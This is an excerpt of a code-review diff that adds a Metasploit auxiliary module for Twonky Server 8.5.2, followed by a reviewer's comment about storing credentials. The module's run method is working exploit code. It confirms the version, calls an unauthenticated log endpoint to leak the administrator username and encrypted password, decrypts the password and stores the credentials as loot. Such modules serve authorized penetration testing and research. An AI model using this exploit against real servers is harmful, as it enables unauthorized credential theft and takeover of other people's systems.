modules/auxiliary/gather/twonky_authbypass_logleak.rb

```diff
@@ -0,0 +1,154 @@
+      ]
+    )
+  end
+
+  def run
+    # Unauthenticated requests to the '/dev0/desc.xml' endpoint should return the version number
+    print_status('Confirming the target is vulnerable')
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'dev0', 'desc.xml')
+      }
+    )
+
+    fail_with(Failure::Unknown, 'Connection failed - unable to get XML web response') unless res
+
+    # Confirm that the response contains the expected 8.5.2 XML string
+    if (res&.code != 200) || (!res.body.include? '<modelNumber>8.5.2</modelNumber>')
+      fail_with(Failure::NotVulnerable, 'The target does not appear to be a Twonky Server instance running version 8.5.2')
+    end
+
+    print_good('The target is Twonky Server v8.5.2')
+
+    print_status('Attempting to leak the administrator username and encrypted password')
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'nmc', 'rpc', 'log_getfile')
+      }
+    )
+
+    fail_with(Failure::Unknown, 'Connection failed - unable to get log API response') unless res
+
+    # Grab the most recent (last) administrator username value from the logs
+    pattern = /accessuser\s*=\s*(\S+)\n/
+    result = res.body.scan(pattern).last
+
+    # If the log has been cleared since startup or the server hasn't restarted since setup
+    fail_with(Failure::NotFound, 'The target did not return a log file containing a username value') unless result
+
+    username = result[0]
+
+    print_good("The target returned the administrator username: #{username}")
+
+    # Grab the most recent (last) password value from the logs to decrypt
+    # "||" + hex number (key index) + hex Blowfish ECB ciphertext
+    pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)\n/
+    result = res.body.scan(pattern).last
+
+    # If the log has been cleared since the last password change or the server hasn't restarted since setup
+    fail_with(Failure::NotFound, 'The target did not return a log file containing a password value') unless result
+
+    # Extract the encryption key index as base16
+    enc_key_index = result[0]
+
+    # Handle possible match array containing more than minimum 16 chars (longer encrypted password)
+    if !result[2].nil?
+      enc_pwd = result[1] + result[2..].join
+    else
+      enc_pwd = result[1]
+    end
+
+    print_good("The target returned the encrypted password and key index: #{enc_pwd}, #{enc_key_index}")
+
+    # Decrypt the admin password using static key
+    password = decrypt_password(enc_pwd, enc_key_index)
+
+    print_good("Credentials decrypted: USER=#{username} PASS=#{password}")
+
+    report_vuln(
+      host: rhost,
+      name: name,
+      refs: references
+    )
+
+    store_loot('Twonky Server Credentials', 'text/plain', datastore['RHOST'], "Username: \"#{username}\" Password: \"#{password}\"")
```

Comment:
The credentials should also be stored as creds using the `store_valid_credential` API.